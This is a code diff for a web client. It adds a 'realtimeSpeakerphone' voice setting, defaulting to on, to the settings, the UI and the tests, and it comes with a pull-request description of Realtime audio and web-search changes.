+++ b/packages/web-client/src/controllers/speechAudioController.test.ts
@@ -112,6 +112,7 @@ function createInitialVoiceSettings(overrides?: Partial<VoiceSettings>): VoiceSe
     voiceRuntimeMode: 'thread',
     realtimeConversationId: '',
     realtimeMuteOnStart: false,
+    realtimeSpeakerphone: true,
     realtimeListsInstanceId: 'default',
     audioMode: 'off',
     autoListenEnabled: false,

--- a/packages/web-client/src/index.ts
+++ b/packages/web-client/src/index.ts
@@ -4051,10 +4051,15 @@ async function main(): Promise<void> {
     const realtimeMuteOnStartCheckbox = document.getElementById(
       'realtime-mute-on-start-checkbox',
     ) as HTMLInputElement | null;
+    const realtimeSpeakerphoneCheckbox = document.getElementById(
+      'realtime-speakerphone-checkbox',
+    ) as HTMLInputElement | null;
     const nextSettings = normalizeVoiceSettings({
       ...currentSettings,
       voiceRuntimeMode: voiceRuntimeModeSelectEl.value,
       realtimeMuteOnStart: realtimeMuteOnStartCheckbox?.checked ?? currentSettings.realtimeMuteOnStart,
+      realtimeSpeakerphone:
+        realtimeSpeakerphoneCheckbox?.checked ?? currentSettings.realtimeSpeakerphone,
       audioMode: audioModeSelectEl.value,
       autoListenEnabled: autoListenCheckboxEl.checked,
       standaloneNotificationPlaybackEnabled: standaloneNotificationPlaybackCheckboxEl.checked,
@@ -4093,6 +4098,9 @@ async function main(): Promise<void> {
   const realtimeMuteOnStartCheckboxEl = document.getElementById(
     'realtime-mute-on-start-checkbox',
   ) as HTMLInputElement | null;
+  const realtimeSpeakerphoneCheckboxEl = document.getElementById(
+    'realtime-speakerphone-checkbox',
+  ) as HTMLInputElement | null;
   const realtimeStartButtonEl = document.getElementById(
     'realtime-start-button',
   ) as HTMLButtonElement | null;
@@ -4120,6 +4128,7 @@ async function main(): Promise<void> {
   [
     voiceRuntimeModeSelectEl,
     realtimeMuteOnStartCheckboxEl,
+    realtimeSpeakerphoneCheckboxEl,
     audioModeSelectEl,
     autoListenCheckboxEl,
     standaloneNotificationPlaybackCheckboxEl,
@@ -4169,6 +4178,9 @@ async function main(): Promise<void> {
     voiceRuntimeModeSelectEl.value = settings.voiceRuntimeMode;
     if (realtimeMuteOnStartCheckboxEl) {
       realtimeMuteOnStartCheckboxEl.checked = settings.realtimeMuteOnStart;
+    }
+    if (realtimeSpeakerphoneCheckboxEl) {
+      realtimeSpeakerphoneCheckboxEl.checked = settings.realtimeSpeakerphone;
     }
     syncRealtimeControlsVisibility();
     audioModeSelectEl.value = settings.audioMode;

--- a/packages/web-client/src/panels/input/runtime.test.ts
+++ b/packages/web-client/src/panels/input/runtime.test.ts
@@ -95,6 +95,7 @@ describe('createInputRuntime', () => {
         voiceRuntimeMode: 'thread',
         realtimeConversationId: '',
         realtimeMuteOnStart: false,
+        realtimeSpeakerphone: true,
         realtimeListsInstanceId: 'default',
         audioMode: 'tool',
         autoListenEnabled: true,

--- a/packages/web-client/src/utils/voiceSettings.ts
+++ b/packages/web-client/src/utils/voiceSettings.ts
@@ -25,6 +25,8 @@ export interface VoiceSettings {
   voiceRuntimeMode: VoiceRuntimeMode;
   realtimeConversationId: string;
   realtimeMuteOnStart: boolean;
+  /** Prefer phone loudspeaker for Realtime when no Bluetooth headset is connected. */
+  realtimeSpeakerphone: boolean;
   realtimeListsInstanceId: string;
   audioMode: AudioMode;
   autoListenEnabled: boolean;
@@ -154,6 +156,7 @@ export function createDefaultVoiceSettings(options?: {
     voiceRuntimeMode: 'thread',
     realtimeConversationId: '',
     realtimeMuteOnStart: false,
+    realtimeSpeakerphone: true,
     realtimeListsInstanceId: 'default',
     audioMode: isAndroid ? 'tool' : 'off',
     autoListenEnabled: isAndroid,
@@ -195,6 +198,10 @@ export function normalizeVoiceSettings(
       typeof record['realtimeMuteOnStart'] === 'boolean'
         ? record['realtimeMuteOnStart']
         : defaults.realtimeMuteOnStart,
+    realtimeSpeakerphone:
+      typeof record['realtimeSpeakerphone'] === 'boolean'
+        ? record['realtimeSpeakerphone']
+        : defaults.realtimeSpeakerphone,
     realtimeListsInstanceId:
       normalizeOptionalString(record['realtimeListsInstanceId']) || defaults.realtimeListsInstanceId,
     audioMode: normalizeAudioMode(
@@ -253,6 +260,7 @@ export function areVoiceSettingsEqual(left: VoiceSettings, right: VoiceSettings)
     left.voiceRuntimeMode === right.voiceRuntimeMode &&
     left.realtimeConversationId === right.realtimeConversationId &&
     left.realtimeMuteOnStart === right.realtimeMuteOnStart &&
+    left.realtimeSpeakerphone === right.realtimeSpeakerphone &&
     left.realtimeListsInstanceId === right.realtimeListsInstanceId &&
     left.audioMode === right.audioMode &&
     left.autoListenEnabled === right.autoListenEnabled &&


### PR DESCRIPTION
## Summary
- Add built-in `web_search` tool (local Grok CLI headless research for text agents and Realtime allowlists), with Realtime tool timeout aligned to text agents.
- Recover stale Realtime owner fence so Thread voice can leave "connecting" after Realtime.
- Add Realtime speakerphone preference (default on): phone loudspeaker instead of quiet earpiece; SCO/BLE headsets only for BT voice path; A2DP-only media speakers no longer suppress loudspeaker; API 31+ uses `setCommunicationDevice(BUILTIN_SPEAKER)`.

## Test plan
- [x] Agent-server web_search unit tests
- [x] Android unit tests (AudioRouter, RuntimeService, Config)
- [x] Deployed Android default flavor; verified Thread reconnect and speakerphone with A2DP speaker
- [ ] Enable `web_search` on target agent / Realtime allowlist in deploy config if not already
- [ ] Spot-check Realtime web_search turn and Thread queue mode on device
